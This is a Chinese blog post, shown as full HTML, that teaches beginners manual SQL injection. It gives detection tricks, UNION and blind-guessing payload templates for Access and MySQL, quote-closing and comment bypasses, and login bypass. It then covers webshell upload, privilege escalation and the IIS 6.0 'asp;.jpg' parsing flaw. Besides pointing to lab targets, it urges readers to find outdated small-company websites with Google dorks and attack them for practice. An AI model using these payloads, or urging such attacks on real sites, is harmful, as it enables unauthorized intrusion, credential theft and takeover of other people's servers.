<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
    <meta name="description" content="前言 忽然想起来有几天没有更新了，django搭建的博客马上就要完工，也马上快要开学，所以趁着这几天再更新几篇文章。   今天选择的是入门很快的web渗透之手工注入。   有很多人从小就对黑客感兴趣，我也不例外。但是搜索资料直接搜索黑客相关的，搜出来的东西很多很杂，因为黑客要会渗透的东西很多，一时也找不到这个方面的入口。所以今天来讲一讲比较容易懂，也上手快的web渗透之sql手工注入。">
<meta name="keywords" content="Web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="web渗透-基本入门方法以及sql手工注入">
<meta property="og:url" content="http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/index.html">
<meta property="og:site_name" content="Yokeen&#39;s blog">
<meta property="og:description" content="前言 忽然想起来有几天没有更新了，django搭建的博客马上就要完工，也马上快要开学，所以趁着这几天再更新几篇文章。   今天选择的是入门很快的web渗透之手工注入。   有很多人从小就对黑客感兴趣，我也不例外。但是搜索资料直接搜索黑客相关的，搜出来的东西很多很杂，因为黑客要会渗透的东西很多，一时也找不到这个方面的入口。所以今天来讲一讲比较容易懂，也上手快的web渗透之sql手工注入。">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2018-11-29T13:33:37.085Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="web渗透-基本入门方法以及sql手工注入">
<meta name="twitter:description" content="前言 忽然想起来有几天没有更新了，django搭建的博客马上就要完工，也马上快要开学，所以趁着这几天再更新几篇文章。   今天选择的是入门很快的web渗透之手工注入。   有很多人从小就对黑客感兴趣，我也不例外。但是搜索资料直接搜索黑客相关的，搜出来的东西很多很杂，因为黑客要会渗透的东西很多，一时也找不到这个方面的入口。所以今天来讲一讲比较容易懂，也上手快的web渗透之sql手工注入。">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>web渗透-基本入门方法以及sql手工注入</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "top"="" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/friend/">Friend</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post " href="/2016/09/17/最近目标/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post " href="/2016/08/23/python-web框架django博客开发/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&text=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&is_video=false&description=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=web渗透-基本入门方法以及sql手工注入&body=Check out this article: http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&name=web渗透-基本入门方法以及sql手工注入&description=&lt;h1 id=&#34;前言&#34;&gt;&lt;a href=&#34;#前言&#34; class=&#34;headerlink&#34; title=&#34;前言&#34;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;blockquote&gt;
&lt;p&gt;忽然想起来有几天没有更新了，django搭建的博客马上就要完工，也马上快要开学，所以趁着这几天再更新几篇文章。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;今天选择的是入门很快的web渗透之手工注入。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;有很多人从小就对黑客感兴趣，我也不例外。但是搜索资料直接搜索黑客相关的，搜出来的东西很多很杂，因为黑客要会渗透的东西很多，一时也找不到这个方面的入口。所以今天来讲一讲比较容易懂，也上手快的web渗透之sql手工注入。&lt;br&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&t=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#开始"><span class="toc-number">2.</span> <span class="toc-text">开始</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#关于sql注入"><span class="toc-number">2.1.</span> <span class="toc-text">关于sql注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#如何利用简单的方法判断是否有sql注入漏洞"><span class="toc-number">2.2.</span> <span class="toc-text">如何利用简单的方法判断是否有sql注入漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#对于access数据库的手工注入"><span class="toc-number">2.3.</span> <span class="toc-text">对于access数据库的手工注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#对于mysql数据库的手工注入"><span class="toc-number">2.4.</span> <span class="toc-text">对于mysql数据库的手工注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#关于cookie注入和post注入"><span class="toc-number">2.5.</span> <span class="toc-text">关于cookie注入和post注入</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#手工注入的进阶"><span class="toc-number">3.</span> <span class="toc-text">手工注入的进阶</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#闭合法"><span class="toc-number">3.1.</span> <span class="toc-text">闭合法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#注释法"><span class="toc-number">3.2.</span> <span class="toc-text">注释法</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#成功登录后台之后的事"><span class="toc-number">4.</span> <span class="toc-text">成功登录后台之后的事</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#关于漏洞的解析和截断上传"><span class="toc-number">4.1.</span> <span class="toc-text">关于漏洞的解析和截断上传</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#后记"><span class="toc-number">5.</span> <span class="toc-text">后记</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        web渗透-基本入门方法以及sql手工注入
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">Yokeen</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2016-08-27T14:39:37.000Z" itemprop="datePublished">2016-08-27</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/Web安全/">Web安全</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><blockquote>
<p>忽然想起来有几天没有更新了，django搭建的博客马上就要完工，也马上快要开学，所以趁着这几天再更新几篇文章。</p>
</blockquote>
<blockquote>
<p>今天选择的是入门很快的web渗透之手工注入。</p>
</blockquote>
<blockquote>
<p>有很多人从小就对黑客感兴趣，我也不例外。但是搜索资料直接搜索黑客相关的，搜出来的东西很多很杂，因为黑客要会渗透的东西很多，一时也找不到这个方面的入口。所以今天来讲一讲比较容易懂，也上手快的web渗透之sql手工注入。<br><a id="more"></a></p>
</blockquote>
<h1 id="开始"><a href="#开始" class="headerlink" title="开始"></a>开始</h1><h2 id="关于sql注入"><a href="#关于sql注入" class="headerlink" title="关于sql注入"></a>关于sql注入</h2><p>sql注入，就是把sql命令插入到web表单递交或输入域名或者页面请求的查询字符串中去，最终达到欺骗服务器执行恶意的sql命令的一种入侵方法。</p>
<h2 id="如何利用简单的方法判断是否有sql注入漏洞"><a href="#如何利用简单的方法判断是否有sql注入漏洞" class="headerlink" title="如何利用简单的方法判断是否有sql注入漏洞"></a>如何利用简单的方法判断是否有sql注入漏洞</h2><p>在存在id=xx这样的Url动态链接形式中。<br>方法1：在末尾加上   ‘  (一个单引号)   看是否报错，报错存在漏洞，不报错，可能存在漏洞。<br>方法2：在末尾加上and 1=1，再加上and 1=2看两种情况是否报错。 and 1=1正常 and 1=2错误，存在注入漏洞。</p>
<h2 id="对于access数据库的手工注入"><a href="#对于access数据库的手工注入" class="headerlink" title="对于access数据库的手工注入"></a>对于access数据库的手工注入</h2><p>方法1：联合查询法<br>①and 1=1    and 1=2   或者 ‘   (观察是否报错来判断是否为一个注入点，并且通过报错来得知相关的信息，比如数据库类型)<br>②order by xx    (查询当前页面连接的字段个数，这里需要不断的试，比如输入order 6报错，order by 5不报错，就说明有5个字段数。)<br>③union select 1,2,3,4,5 from 要猜测的表名   (对于猜测的表名，猜测正确，页面返回正常并且爆出显位(爆出数据的位置)，猜测错误，页面返回失败)<br>④union select 1,xx,3,4,xx from 猜对的表名  (通过爆出的显位，我们在显位中输入要猜测的列名。列名猜对，就可以在显位中爆出数据)<br>方法2：逐字猜解法<br>①and 1=1  and 1=2 或者 ‘  （来简单的判断是否有注入点）<br>②order by xx          (这时候发现order by 多少页面都不会报错)<br>③and exists(select * from 要猜测的表名)      —存在返回正常<br>④and exists(select 要猜测的列名 from 猜对的表名)   ——存在返回正常<br>⑤and (select top 1 len(列名) from 表名)&gt;=xx    ——-这里猜这个列名的数据的长度是多少不断测试<br>⑥and (select top 1 asc(mid(列名,1,1)) from 表名) &gt;=97   ——这里猜测的是列名数据的第一位的ascii码是多少，不断测试。<br> and (select top 1 asc(mid(列名,2,1)) from 表名) &gt;=97    ——猜测列名数据的第二位的ascii码是多少，不断测试<br> 接下来以此类推，直到猜测出他的列名数据是多少。</p>
<hr>
<p>注意：windows和Linux区分大小写问题。</p>
<h2 id="对于mysql数据库的手工注入"><a href="#对于mysql数据库的手工注入" class="headerlink" title="对于mysql数据库的手工注入"></a>对于mysql数据库的手工注入</h2><blockquote>
<p>这里有必要讲一下关于mysql和access数据库的不同,(mssql和Mysql类型一样)<br>access数据库下，直接是好多表，然后表里是字段，字段再对应相关的数据。<br>mysql数据库下，又分为好多数据库，然后相应的数据库里有相关的表，表里的字段，字段的数据。</p>
</blockquote>
<p>首先我们需要知道几个查询的参数。<br>user()当前数据库用户  version()当前数据库版本 database()当前页面所连接数据库名称   @@version_complie_os服务器操作系统</p>
<p>之所以要查操作系统，是因为windows和linux的大小写区分问题，有时候不是你的命令输错了，而是你没注意大小写。</p>
<p>①and 1=1  and 1=2  或者 ‘<br>②order by 5       (以5个字段举例)<br>③union select 1,2,3,4,5   (查看爆出的显位)  —–这里之所以不用类似access的from是因为对access的注入是属于暴力猜解，而对于mysql是属于有依据的注入，因为mysql里边有个叫information_schema的数据库，这里边储存了所有数据库的信息。<br>④union select 1,@@version_complie_os,3,database(),5         –在显位处填上要查找的信息方便下一步操作以及关于是否调整大小写<br>⑤union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=当前页面连接数据库的十六进制<br>    (从information_schema.tables这个表中查询当前页面数据库的所有表)<br>⑥union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=想要查询数据库表的十六进制名称        (从上一步中找到想要的表名，然后从information_schema.columns这个表中查询当前这个表下的所有列名)<br>⑦union select 1，字段名，2，3，4，5 from 表名   (从想要的表名中得出想要的字段的数据)</p>
<p>如果你找到了管理员的帐号和密码，就可以用工具扫到这个网站的后台页面，来对网站进行管理，不过后台的权限一般很小，注入是为了下一步的获得更高权限的铺垫。</p>
<h2 id="关于cookie注入和post注入"><a href="#关于cookie注入和post注入" class="headerlink" title="关于cookie注入和post注入"></a>关于cookie注入和post注入</h2><p>其实有好多工具也是集合了好多手工注入的指令，不过工具的比较死板，所以有时候工具注入不了试试手工注入万一注入了呢。</p>
<blockquote>
<p>cookie注入一般是结合工具。<br>第一种、利用burp抓包后保存为文件，然后在sqlmap下指定这个文件，让他判断并且注入。<br>第二种、直接利用sqlmap来进行注入。</p>
</blockquote>
<p>具体的方法可以结合burpsuite和sqlmap的教程，网上也有。</p>
<blockquote>
<p>关于post注入<br>以前有很多漏洞，比如在用户名框和密码框输入一段指定的代码，就可以绕过用户名和密码的输入，从而直接登陆成功。</p>
</blockquote>
<h1 id="手工注入的进阶"><a href="#手工注入的进阶" class="headerlink" title="手工注入的进阶"></a>手工注入的进阶</h1><h2 id="闭合法"><a href="#闭合法" class="headerlink" title="闭合法"></a>闭合法</h2><p>①字符类型<br>‘ 语句 and’1=’1      语句就可以填写order by……<br>②搜索型<br> %’ 语句 and ‘%1%’=%1</p>
<h2 id="注释法"><a href="#注释法" class="headerlink" title="注释法"></a>注释法</h2><p>这种方法主要是针对于php网页去做。<br>当我们用order by 1就报错的时候，并不是没有字段，而是他的sql查询语句写的比较复杂，我们在语句的最后边加上–，因为–在php中就是注释的意思。这样一切返回正常。<br>然后union select 1,2,3,4,5–    看看这样是否会爆出显位，如果没有爆出来，我们可以在id=xx后边加上一个  -   ，故意让他报错来爆出显位，然后利用前边讲的方法来进行相应的手工注入。</p>
<p>order by 一定要用–，union select可以不用，自己尝试。</p>
<h1 id="成功登录后台之后的事"><a href="#成功登录后台之后的事" class="headerlink" title="成功登录后台之后的事"></a>成功登录后台之后的事</h1><blockquote>
<p>这时候我们已经成功的拿到了网站后台的用户名和密码并且登录成功，但是网站后台管理员的权限一般都比较小，所以我们通过上传大马来拿到webshell权限或或通过在网站的上传点上传一句话木马，来利用菜刀或者蚁剑来连接一句话木马，然后进行上传提权工具来进行提权。</p>
</blockquote>
<h2 id="关于漏洞的解析和截断上传"><a href="#关于漏洞的解析和截断上传" class="headerlink" title="关于漏洞的解析和截断上传"></a>关于漏洞的解析和截断上传</h2><p>这里小小的提一下。<br>其中比较典型的就是iis6.0，正常命名方式xxx.jpg，触发漏洞命名方式xxx.asp;.jpg让这个图片格式的以asp格式来解析。解析成功我们就可以连接他。通常你上传一个一句话木马的图片后，服务器并没有解析他，你用菜刀或者蚁剑连接不了，通过文件名漏洞来解析他，这样就可以成功地用工具来连接这个一句话木马。</p>
<p>这里相关的还有iis7.0和iis7.5以及nginx&lt;8.03的漏洞，还有apache的向左解析法漏洞。</p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>这里就先简单的介绍一下web渗透最基本的手工注入流程。</p>
<p>说实话现在的好多工具已经做的很不错了，用工具可以进行很方便的注入，但是为了入门，还是选择了最容易上手的手工注入来做讲解，打开这扇神秘的大门，关于靶机可以在i春秋网站的实验上找到，可以用来练练手，试验机的漏洞都非常多，注入起来也很方便，容易成功来提升信心。<br>现在也有好多小公司的网站用的是比较老的方法，没有进行更新，可以用谷歌语法来找一找，进行实战。</p>
<p>手工注入就先告一段落，马上就要开学，等到学校后再进行后续的更新，我目前先继续搞web渗透，等web渗透差不多了，在这个方向上再会陆续学习逆向工程等等…..</p>
<p>以上都是我通过学习总结出来的，可能写得多也会有地方出错，如果有地方出错了，欢迎指正</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/friend/">Friend</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#开始"><span class="toc-number">2.</span> <span class="toc-text">开始</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#关于sql注入"><span class="toc-number">2.1.</span> <span class="toc-text">关于sql注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#如何利用简单的方法判断是否有sql注入漏洞"><span class="toc-number">2.2.</span> <span class="toc-text">如何利用简单的方法判断是否有sql注入漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#对于access数据库的手工注入"><span class="toc-number">2.3.</span> <span class="toc-text">对于access数据库的手工注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#对于mysql数据库的手工注入"><span class="toc-number">2.4.</span> <span class="toc-text">对于mysql数据库的手工注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#关于cookie注入和post注入"><span class="toc-number">2.5.</span> <span class="toc-text">关于cookie注入和post注入</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#手工注入的进阶"><span class="toc-number">3.</span> <span class="toc-text">手工注入的进阶</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#闭合法"><span class="toc-number">3.1.</span> <span class="toc-text">闭合法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#注释法"><span class="toc-number">3.2.</span> <span class="toc-text">注释法</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#成功登录后台之后的事"><span class="toc-number">4.</span> <span class="toc-text">成功登录后台之后的事</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#关于漏洞的解析和截断上传"><span class="toc-number">4.1.</span> <span class="toc-text">关于漏洞的解析和截断上传</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#后记"><span class="toc-number">5.</span> <span class="toc-text">后记</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&text=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&is_video=false&description=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=web渗透-基本入门方法以及sql手工注入&body=Check out this article: http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&title=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&name=web渗透-基本入门方法以及sql手工注入&description=&lt;h1 id=&#34;前言&#34;&gt;&lt;a href=&#34;#前言&#34; class=&#34;headerlink&#34; title=&#34;前言&#34;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;blockquote&gt;
&lt;p&gt;忽然想起来有几天没有更新了，django搭建的博客马上就要完工，也马上快要开学，所以趁着这几天再更新几篇文章。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;今天选择的是入门很快的web渗透之手工注入。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;有很多人从小就对黑客感兴趣，我也不例外。但是搜索资料直接搜索黑客相关的，搜出来的东西很多很杂，因为黑客要会渗透的东西很多，一时也找不到这个方面的入口。所以今天来讲一讲比较容易懂，也上手快的web渗透之sql手工注入。&lt;br&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://lessismore.cool/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/&t=web渗透-基本入门方法以及sql手工注入"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2021
    Yokeen
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/friend/">Friend</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'">


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>

<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
